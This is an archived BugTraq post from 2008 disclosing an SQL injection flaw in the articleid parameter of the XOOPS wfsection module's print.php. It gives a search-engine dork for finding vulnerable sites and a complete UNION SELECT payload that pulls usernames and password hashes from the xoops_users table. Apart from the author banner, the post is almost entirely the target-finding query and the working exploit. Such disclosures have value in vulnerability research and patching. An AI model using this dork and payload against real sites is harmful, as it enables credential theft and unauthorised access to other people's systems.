BugTraq
XOOPS Module section SQL Injection(articleid) Feb 18 2008 05:20PM
hackturkiye hackturkiye gmail com
###############################################################

#

# XOOPS Module section SQL Injection(articleid)

#

###############################################################

#

# AUTHOR : S@BUN

#

# HOME 1 : http://www.milw0rm.com/author/1334

#

# MAİL : hackturkiye.hackturkiye (at) gmail (dot) com [email concealed]

#

################################################################

#

# DORK 1 : allinurl: modules/wfsection/print.php?articleid=

#

################################################################

EXPLOIT :

-9999999+union/**/select/**/char(117,115,101,114,110,97,109,101,58),1,2,
concat(uname,0x3a,pass),0,0,0,0,0,0,1,1,1,1,0,char(117,115,101,114,110,9
7,109,101,58),0,0,0,1,2,2,0,0,0,2,2,2+from/**/xoops_users/*%20where%20pa
ss%20admin%20

################################################################

# S@BUN i AM NOT HACKER S@BUN

################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus